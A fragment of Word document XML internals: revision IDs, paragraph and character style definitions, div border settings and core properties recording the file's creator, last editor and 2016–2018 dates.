    <w:rsid w:val="0006271B"/>
    <w:rsid w:val="00065BE7"/>
    <w:rsid w:val="000779DD"/>
    <w:rsid w:val="000835CA"/>
    <w:rsid w:val="00083802"/>
    <w:rsid w:val="000864CE"/>
    <w:rsid w:val="00090B9F"/>
    <w:rsid w:val="0009212C"/>
    <w:rsid w:val="00097DAC"/>
    <w:rsid w:val="000A2C99"/>
    <w:rsid w:val="000B690E"/>
    <w:rsid w:val="000C6267"/>
    <w:rsid w:val="000C7442"/>
    <w:rsid w:val="000D5ACF"/>
    <w:rsid w:val="000E52A5"/>
    <w:rsid w:val="00106EE9"/>
    <w:rsid w:val="00133257"/>
    <w:rsid w:val="00151C10"/>
    <w:rsid w:val="00163BE6"/>
    <w:rsid w:val="00196628"/>
    <w:rsid w:val="001B64B6"/>
    <w:rsid w:val="001C5980"/>
    <w:rsid w:val="001E2FBB"/>
    <w:rsid w:val="001F0055"/>
    <w:rsid w:val="001F7A63"/>
    <w:rsid w:val="002026CC"/>
    <w:rsid w:val="00205D8F"/>
    <w:rsid w:val="00205EA8"/>
    <w:rsid w:val="00215973"/>
    <w:rsid w:val="00225200"/>
    <w:rsid w:val="00231332"/>
    <w:rsid w:val="0024726A"/>
    <w:rsid w:val="00270FC4"/>
    <w:rsid w:val="00271886"/>
    <w:rsid w:val="002911FA"/>
    <w:rsid w:val="002A21A2"/>
    <w:rsid w:val="002D2F6E"/>
    <w:rsid w:val="002E5D4D"/>
    <w:rsid w:val="002E7019"/>
    <w:rsid w:val="00300EDA"/>
    <w:rsid w:val="003066AF"/>
    <w:rsid w:val="003068F1"/>
    <w:rsid w:val="003261D0"/>
    <w:rsid w:val="00354EA6"/>
    <w:rsid w:val="0036340D"/>
    <w:rsid w:val="00364EAC"/>
    <w:rsid w:val="00385D8C"/>
    <w:rsid w:val="003908EF"/>
    <w:rsid w:val="003A1010"/>
    <w:rsid w:val="003A3178"/>
    <w:rsid w:val="003B468C"/>
    <w:rsid w:val="003B6C16"/>
    <w:rsid w:val="003C2D87"/>
    <w:rsid w:val="003E3BC8"/>
    <w:rsid w:val="003E62AB"/>
    <w:rsid w:val="00402DA0"/>
    <w:rsid w:val="0041260F"/>
    <w:rsid w:val="00416F14"/>
    <w:rsid w:val="004323C6"/>
    <w:rsid w:val="00433CFE"/>
    <w:rsid w:val="0044648E"/>
    <w:rsid w:val="004478A2"/>
    <w:rsid w:val="00466BE7"/>
    <w:rsid w:val="004678E1"/>
    <w:rsid w:val="00475E22"/>
    <w:rsid w:val="00485CD3"/>
    <w:rsid w:val="004916DE"/>
    <w:rsid w:val="00494D6B"/>
    <w:rsid w:val="004B0EBD"/>
    <w:rsid w:val="004C572D"/>
    <w:rsid w:val="004D16F8"/>
    <w:rsid w:val="004D323C"/>
    <w:rsid w:val="004D3585"/>
    <w:rsid w:val="004D7071"/>
    <w:rsid w:val="004E51D6"/>
    <w:rsid w:val="004F15F0"/>
    <w:rsid w:val="005040B2"/>
    <w:rsid w:val="00511852"/>
    <w:rsid w:val="00517553"/>
    <w:rsid w:val="005278C8"/>
    <w:rsid w:val="0054493F"/>
    <w:rsid w:val="00551637"/>
    <w:rsid w:val="0056153E"/>
    <w:rsid w:val="005833E5"/>
    <w:rsid w:val="00594F9C"/>
    <w:rsid w:val="005A04F6"/>
    <w:rsid w:val="005A75B2"/>
    <w:rsid w:val="005A76D4"/>
    <w:rsid w:val="005D54E3"/>
    <w:rsid w:val="005F6F97"/>
    <w:rsid w:val="006049FB"/>
    <w:rsid w:val="006126D9"/>
    <w:rsid w:val="00617373"/>
    <w:rsid w:val="006273C4"/>
    <w:rsid w:val="00636722"/>
    <w:rsid w:val="006414C9"/>
    <w:rsid w:val="00642557"/>
    <w:rsid w:val="006657D3"/>
    <w:rsid w:val="00670017"/>
    <w:rsid w:val="006709EF"/>
    <w:rsid w:val="006A0920"/>
    <w:rsid w:val="006A2D09"/>
    <w:rsid w:val="006C0796"/>
    <w:rsid w:val="006C1617"/>
    <w:rsid w:val="006E4FD5"/>
    <w:rsid w:val="00712E8C"/>
    <w:rsid w:val="00713040"/>
    <w:rsid w:val="00721AAF"/>
    <w:rsid w:val="00730FE3"/>
    <w:rsid w:val="007351F9"/>
    <w:rsid w:val="00736E3C"/>
    <w:rsid w:val="00737A02"/>
    <w:rsid w:val="00747957"/>
    <w:rsid w:val="00752AE6"/>
    <w:rsid w:val="007604D6"/>
    <w:rsid w:val="007664CE"/>
    <w:rsid w:val="0079425C"/>
    <w:rsid w:val="007C22CC"/>
    <w:rsid w:val="007D06E9"/>
    <w:rsid w:val="007D57CD"/>
    <w:rsid w:val="007D7697"/>
    <w:rsid w:val="007F1545"/>
    <w:rsid w:val="007F6355"/>
    <w:rsid w:val="0080399D"/>
    <w:rsid w:val="00803DD3"/>
    <w:rsid w:val="0081422C"/>
    <w:rsid w:val="008268D2"/>
    <w:rsid w:val="008276EC"/>
    <w:rsid w:val="00835D10"/>
    <w:rsid w:val="008421FB"/>
    <w:rsid w:val="00843E35"/>
    <w:rsid w:val="00846F63"/>
    <w:rsid w:val="00853DCD"/>
    <w:rsid w:val="00855165"/>
    <w:rsid w:val="00856A76"/>
    <w:rsid w:val="00864FA2"/>
    <w:rsid w:val="00865C3D"/>
    <w:rsid w:val="0086704E"/>
    <w:rsid w:val="00867E34"/>
    <w:rsid w:val="00870292"/>
    <w:rsid w:val="008703BC"/>
    <w:rsid w:val="00873BFB"/>
    <w:rsid w:val="0089659C"/>
    <w:rsid w:val="008A3534"/>
    <w:rsid w:val="008C04B1"/>
    <w:rsid w:val="008D1A44"/>
    <w:rsid w:val="008D7954"/>
    <w:rsid w:val="009005B4"/>
    <w:rsid w:val="00913C12"/>
    <w:rsid w:val="00914D20"/>
    <w:rsid w:val="00920534"/>
    <w:rsid w:val="00923D3F"/>
    <w:rsid w:val="00926006"/>
    <w:rsid w:val="009503CA"/>
    <w:rsid w:val="00951010"/>
    <w:rsid w:val="00954F1C"/>
    <w:rsid w:val="00965883"/>
    <w:rsid w:val="009748D1"/>
    <w:rsid w:val="00977B0F"/>
    <w:rsid w:val="0099432B"/>
    <w:rsid w:val="00997327"/>
    <w:rsid w:val="009B4565"/>
    <w:rsid w:val="009D564C"/>
    <w:rsid w:val="009E528B"/>
    <w:rsid w:val="009E6362"/>
    <w:rsid w:val="009F0B0B"/>
    <w:rsid w:val="009F31A1"/>
    <w:rsid w:val="00A01031"/>
    <w:rsid w:val="00A041C4"/>
    <w:rsid w:val="00A176CC"/>
    <w:rsid w:val="00A363CE"/>
    <w:rsid w:val="00A539D2"/>
    <w:rsid w:val="00A85B64"/>
    <w:rsid w:val="00A90314"/>
    <w:rsid w:val="00AC682D"/>
    <w:rsid w:val="00B05C13"/>
    <w:rsid w:val="00B065F6"/>
    <w:rsid w:val="00B06F99"/>
    <w:rsid w:val="00B27041"/>
    <w:rsid w:val="00B320C2"/>
    <w:rsid w:val="00B435E3"/>
    <w:rsid w:val="00B54076"/>
    <w:rsid w:val="00B575B4"/>
    <w:rsid w:val="00B60136"/>
    <w:rsid w:val="00B90A68"/>
    <w:rsid w:val="00B92D19"/>
    <w:rsid w:val="00B95977"/>
    <w:rsid w:val="00BB0D68"/>
    <w:rsid w:val="00BB1066"/>
    <w:rsid w:val="00BD195F"/>
    <w:rsid w:val="00BD2A40"/>
    <w:rsid w:val="00BE05F7"/>
    <w:rsid w:val="00BF4706"/>
    <w:rsid w:val="00BF7A68"/>
    <w:rsid w:val="00C04111"/>
    <w:rsid w:val="00C04F61"/>
    <w:rsid w:val="00C06D09"/>
    <w:rsid w:val="00C218C1"/>
    <w:rsid w:val="00C260C3"/>
    <w:rsid w:val="00C50230"/>
    <w:rsid w:val="00C51C09"/>
    <w:rsid w:val="00C64907"/>
    <w:rsid w:val="00C939AA"/>
    <w:rsid w:val="00CA726F"/>
    <w:rsid w:val="00CA78DC"/>
    <w:rsid w:val="00CB5411"/>
    <w:rsid w:val="00CD0309"/>
    <w:rsid w:val="00CE2F55"/>
    <w:rsid w:val="00CF31AE"/>
    <w:rsid w:val="00CF79C6"/>
    <w:rsid w:val="00D05F8B"/>
    <w:rsid w:val="00D12602"/>
    <w:rsid w:val="00D30279"/>
    <w:rsid w:val="00D31726"/>
    <w:rsid w:val="00D37E61"/>
    <w:rsid w:val="00D75049"/>
    <w:rsid w:val="00D84C52"/>
    <w:rsid w:val="00DA63FD"/>
    <w:rsid w:val="00DC09FD"/>
    <w:rsid w:val="00DC1F17"/>
    <w:rsid w:val="00DD3C3A"/>
    <w:rsid w:val="00DD540D"/>
    <w:rsid w:val="00DE055F"/>
    <w:rsid w:val="00DE09BD"/>
    <w:rsid w:val="00DF15E8"/>
    <w:rsid w:val="00E1663B"/>
    <w:rsid w:val="00E25482"/>
    <w:rsid w:val="00E27E5A"/>
    <w:rsid w:val="00E34A52"/>
    <w:rsid w:val="00E4270F"/>
    <w:rsid w:val="00E508C7"/>
    <w:rsid w:val="00E5327D"/>
    <w:rsid w:val="00E67B48"/>
    <w:rsid w:val="00E706B2"/>
    <w:rsid w:val="00E80C9F"/>
    <w:rsid w:val="00E85330"/>
    <w:rsid w:val="00E937D5"/>
    <w:rsid w:val="00E97F20"/>
    <w:rsid w:val="00EA7FBE"/>
    <w:rsid w:val="00EE3317"/>
    <w:rsid w:val="00F02319"/>
    <w:rsid w:val="00F32FFF"/>
    <w:rsid w:val="00F4755B"/>
    <w:rsid w:val="00F61219"/>
    <w:rsid w:val="00F6745F"/>
    <w:rsid w:val="00F83108"/>
    <w:rsid w:val="00F9075E"/>
    <w:rsid w:val="00F9244D"/>
    <w:rsid w:val="00F95253"/>
    <w:rsid w:val="00F95338"/>
    <w:rsid w:val="00FB09F4"/>
    <w:rsid w:val="00FB3E37"/>
    <w:rsid w:val="00FC397F"/>
    <w:rsid w:val="00FD1CBC"/>
    <w:rsid w:val="00FE1E7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55B90"/>
  <w15:docId w15:val="{7A533A52-B567-4611-987C-73257B08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2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00846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rsid w:val="005A76D4"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:aliases w:val="Project Title"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>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semiHidden/>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E508C7"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-IE"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00846F63"/>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51123">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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1186821530">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32A23C66-483C-46DD-97C2-CE5BDC0A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creator>gglanville</dc:creator>
  <cp:lastModifiedBy>Shane Murphy</cp:lastModifiedBy>
  <cp:revision>34</cp:revision>
  <cp:lastPrinted>2016-10-16T18:36:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-04-12T03:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-12T11:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>